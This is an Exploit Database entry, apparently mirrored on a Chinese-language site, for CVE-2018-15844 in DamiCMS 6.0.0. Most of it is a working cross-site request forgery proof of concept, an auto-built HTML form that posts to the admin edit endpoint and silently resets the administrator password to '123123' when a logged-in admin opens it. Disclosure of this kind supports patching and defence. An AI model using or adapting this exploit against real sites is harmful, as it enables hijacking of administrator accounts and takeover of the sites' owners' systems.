DamiCMS 6.0.0 – Cross-Site Request Forgery (Change Admin Password)

• Exploit Database
• 41 阅读

• 作者： Autism_JH
  日期： 2018-08-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45314/

• # Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
  # Author: Autism_JH
  # Date: 2018-08-30
  # Vendor Homepage: https://github.com/731276192/damicms
  # Software Link: https://github.com/731276192/damicms
  # Version: 6.0.0
  # CVE: CVE-2018-15844
  
  # Description:
  # DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword.
  # After the administrator login in,open the poc,the administrator account's 
  # password will been changed to 123123
  
  # POC:
  <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  	<body>
  		<script>history.pushState('', '', '/')</script>
  		<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
  			<input type="hidden" name="username" value="admin" />
  			<input type="hidden" name="password" value="123123" />
  			<input type="hidden" name="role&#95;id" value="1" />
  			<input type="hidden" name="id" value="1" />
  			<input type="hidden" name="Submit" value="ç&#161;&#174;å&#174;&#154;ä&#191;&#174;æ&#148;&#185;" />
  			<input type="submit" value="Submit request" />
  		</form>
  	</body>
  </html>